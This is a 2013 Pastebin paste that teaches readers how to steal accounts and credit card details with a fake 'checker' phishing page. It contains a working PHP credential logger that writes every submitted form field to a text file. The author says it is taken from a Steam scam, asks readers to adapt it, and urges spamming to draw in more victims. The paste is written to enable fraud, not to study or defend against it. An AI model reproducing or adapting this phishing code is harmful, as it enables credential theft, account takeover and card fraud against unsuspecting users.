Advertisement
zaitsev15

Untitled

Sep 15th, 2013
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. Let's start , first you need to make your checker.
  2. A fake checker , The problem with this method you can get dead account /cc
  3. So if you dont know how to make fake checker , you can download on google some scam , and you just need to look the php like this (steam scam , but you need to edit for you checker ) :
  4.  
  5.  
  6. <?php
  7. header ('Location:YOU DONT NEED TO USE THAT / BUT YOU CAN');
  8. $handle = fopen("usernames.txt", "a");
  9. foreach($_POST as $variable => $value) {
  10. fwrite($handle, $variable);
  11. fwrite($handle, "=");
  12. fwrite($handle, $value);
  13. fwrite($handle, "\r\n");
  14. }
  15. fwrite($handle, "\r\n");
  16. fclose($handle);
  17. exit;
  18. ?>
  19.  
  20.  
  21. It's not realy the same for you checker , but i think you understand
  22. And if you want more account or cc , you can spam !!
  23.  
  24.  
  25. So becarefull guys and now you know how to have some cc/acc.. for free
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement